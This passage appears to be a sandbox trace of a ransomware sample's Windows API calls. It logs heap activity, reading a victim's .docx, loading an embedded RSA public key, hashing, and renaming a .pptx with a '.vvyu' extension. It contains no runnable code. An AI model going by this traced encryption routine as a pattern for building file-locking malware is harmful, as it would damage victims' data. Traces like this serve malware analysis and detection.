lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b20 [0193.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0193.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b08 [0193.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b38 [0193.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643af0 [0193.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b38 [0193.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b08 | out: hHeap=0x620000) returned 1 [0193.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93828 [0193.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea5c00 [0193.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0193.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643af0 | out: hHeap=0x620000) returned 1 [0193.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea5e10 [0193.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0193.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0193.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6028 [0193.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5e10 | out: hHeap=0x620000) returned 1 [0193.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6028 | out: hHeap=0x620000) returned 1 [0193.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b20 | out: hHeap=0x620000) returned 1 [0193.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93870 | out: hHeap=0x620000) returned 1 [0193.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93888 | out: hHeap=0x620000) returned 1 [0193.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e959b0 | out: hHeap=0x620000) returned 1 [0193.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5c00 | out: hHeap=0x620000) returned 1 [0193.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.558] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0a68*, nNumberOfBytesToWrite=0x518f, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea0a68*, lpNumberOfBytesWritten=0x312fb14*=0x518f, lpOverlapped=0x0) returned 1 [0193.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.559] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5194, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.559] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.560] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.561] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.561] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.561] CloseHandle (hObject=0x568) returned 1 [0193.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0193.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea0a68 [0193.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.563] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\CzDS-.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\czds-.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\CzDS-.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\czds-.pptx.vvyu")) returned 1 [0193.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.564] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.567] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70dc0e70, ftCreationTime.dwHighDateTime=0x1d872b0, ftLastAccessTime.dwLowDateTime=0x9dd33a00, ftLastAccessTime.dwHighDateTime=0x1d889c8, ftLastWriteTime.dwLowDateTime=0x9dd33a00, ftLastWriteTime.dwHighDateTime=0x1d889c8, nFileSizeHigh=0x0, nFileSizeLow=0x17b81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D1q0P.docx", cAlternateFileName="D1Q0P~1.DOC")) returned 1 [0193.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e959b0 [0193.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0193.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e959b0 | out: hHeap=0x620000) returned 1 [0193.568] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\D1q0P.docx") returned=".docx" [0193.568] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\D1q0P.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\d1q0p.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.569] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=97153) returned 1 [0193.570] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.573] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x17b5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.573] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.575] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.575] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x17b81, lpOverlapped=0x0) returned 1 [0193.577] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.577] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.577] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.577] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.578] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.579] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.579] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.579] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.579] GetLastError () returned 0x0 [0193.579] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.579] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.580] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.580] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.580] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x17b80) returned 0x2ea79b0 [0193.581] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e959b0 [0193.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93888 [0193.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e959f8 [0193.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93870 [0193.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93858 [0193.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.582] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea0a68 [0193.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0193.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93858 [0193.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93840 [0193.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0193.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0193.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0193.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0193.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.585] GetCurrentThreadId () returned 0x66c [0193.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f2f0 [0193.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.586] GetCurrentThreadId () returned 0x66c [0193.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 